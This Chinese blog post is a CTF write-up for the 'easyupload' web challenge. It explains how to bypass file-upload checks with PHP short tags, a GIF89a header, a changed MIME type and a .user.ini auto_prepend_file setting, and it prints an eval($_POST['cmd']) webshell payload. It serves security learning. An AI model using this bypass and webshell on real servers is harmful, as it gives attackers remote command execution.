前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

攻防世界专栏:https://blog.csdn.net/m0_63127854/category_11983747.html

Upload-labs专栏:https://blog.csdn.net/m0_63127854/category_11850783.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

题目场景

查看源码

官方WriteUp

BP抓包

F12查看文件去向

蚁剑连接

找到flag


题目场景

查看源码

毫无有效的数据

官方WriteUp

本题需要利用文件上传漏洞点,通过绕过服务器的安全防护,达到getshell的目的

本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行

这里需要绕过的点如下

检查文件内容是否有php字符串检查后缀中是否有htaccess或ph检查文件头部信息文件MIME类型

对于第一点可以利用短标签绕过,例如<?=phpinfo();?>

对于第二点可以通过上传.user.ini以及正常jpg文件来进行getshell,可以参考以下文章

https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html

在服务器中,只要是运用了fastcgi的服务器就能够利用该方式getshell,不论是apache或者ngnix或是其他服务器。
这个文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。
其中很多功能设置了只能php.ini配置,但是还是有一些危险的功能可以被我们控制,比如auto_prepend_file。

第三点绕过方式即在文件头部添加一个图片的文件头,比如GIF89a

第四点绕过方法即修改上传时的Content-Type

因此最终的payload为:
上传.user.ini,内容为

GIF89a
auto_prepend_file=a.jpg

上传a.jpg,内容为

GIF89a
<?=eval($_POST['cmd']);?>

BP抓包

上传.user.ini

再上传a.jpg

F12查看文件去向

蚁剑连接

打开flag查看

找到flag

cyberpeace{85f32dea0ed6b7be27fa02c28a97228f}

攻防世界WEB练习-easyupload相关推荐

  1. 【愚公系列】2023年05月 攻防世界-Web(easyupload)

    文章目录 前言 一.easyupload 1.题目 2.答题 前言 文件上传漏洞是指攻击者通过上传恶意文件的方式,绕过服务器的安全机制,向服务器上传含有恶意代码的文件,从而实现对服务器的攻击. 攻击者 ...

  2. 攻防世界 web篇(一)

    攻防世界 web篇(一) inget fileclude easyupload fileinclude very_easy_sql 攻防世界 是一群信息安全大咖共同研究的答题.竞赛.以游戏方式结合的一 ...

  3. CTF:攻防世界web PART01

    写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出.欢迎各位前来交流.(部分材料来源网络,若有侵权,立即删除) 攻防世界web PART01 baby_web Traini ...

  4. 攻防世界 web高手进阶区 9分题 favorite_number

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是favorite_number的writeup 解题过程 进入界面 简单的代码审计 首先是个判断,既要数组强等于,又要首元素不等 然 ...

  5. 攻防世界——web新手题

    攻防世界----web新手题 1. robots 打开题目场景,发现与robots协议有关,上网搜索robots协议的内容: Robots协议(也称为爬虫协议.机器人协议等)的全称是"网络爬 ...

  6. 攻防世界 web高手进阶区 10分题 weiphp

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的10分题 本文是weiphp的writeup 解题过程 进入界面 点击 进入一个登陆界面 没有注册 那肯定得找源码了 惯例源码+御剑 发现git泄 ...

  7. 攻防世界Web第一天

    攻防世界[Web]第一天 [Web]第一题 解题步骤 总结 [Web]第一题 X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了. 解题步骤 第一:获取在线场景,进入浏览页面. ...

  8. 攻防世界Web题 - unseping 总结

    攻防世界Web题 - unseping 总结 1.审题 进入题目,可以看出来是典型的php反序列化题目. 2.源代码分析 <?php highlight_file(__FILE__); //显示 ...

  9. 攻防世界-----web知识点总结

    WEB 一. 网页源代码的方式 在地址栏前面加上view-source,如view-source:https://www.baidu.com 浏览器的设置菜单框中使用开发者工具,也可以查看网页源代码. ...

最新文章

  1. What is mobile platform?
  2. url散列算法原理_如何列出与网站相关的所有URL
  3. 10-关于DOM的事件操作
  4. Kafka核心源码解析 - KafkaApis源码解析
  5. Python+pandas实现时间序列数据扩展案例一则
  6. 整合vue_直指核心,7天成为Vue高手
  7. 2020年日历电子版(打印版)_灵感 | 快来康康——2020年的日历设计的这么有创意?...
  8. L3-029 还原文件 (30 分)-PAT 团体程序设计天梯赛 GPLT
  9. css选择器优先顺序
  10. php中去除数组中空值,php如何去除数组中空值
  11. 用python做股票量化分析豆瓣_快速入门 Python 爬虫
  12. 数据结构课设之航空订票系统(Java)下载链接在文末
  13. 闪寸 U盘 检测工具 量产工具
  14. mssql数据库和Oracle数据库注入
  15. CSS3动画实现牛顿摆
  16. 蓝桥杯:跳蚂蚱【BFS】【Python】
  17. 成都盛迈坤电商:评价怎么有效回复
  18. Silicon Labs EFR32 RF射频测试-RAILTEST
  19. SAPUI5是什么?Fiori告诉我们将来UI开发用哪种技术?
  20. TCP/IP详解之环回接口(loopback interface)

热门文章

  1. 省份、区域(华南,华北...)自定义颜色
  2. 【CV】Mask R-CNN:用于目标实例分割的通用框架
  3. 两个对象值相同(x.equals(y) == true),但却可有不同的hash code,这句话对不对
  4. 什么是抽象类,为什么要写抽象类
  5. R语言获取GEO表达数据
  6. (超简单)ESP8266深度睡眠模式下远程采集温湿度信息
  7. 支付宝手机网站支付开发详细流程
  8. SSL数字证书申请要多少钱?
  9. 我的世界神奇宝贝服务器注册指令,我的世界神奇宝贝MOD召唤指令汇总攻略
  10. Photoshop脚本 蒙尘与划痕滤镜的使用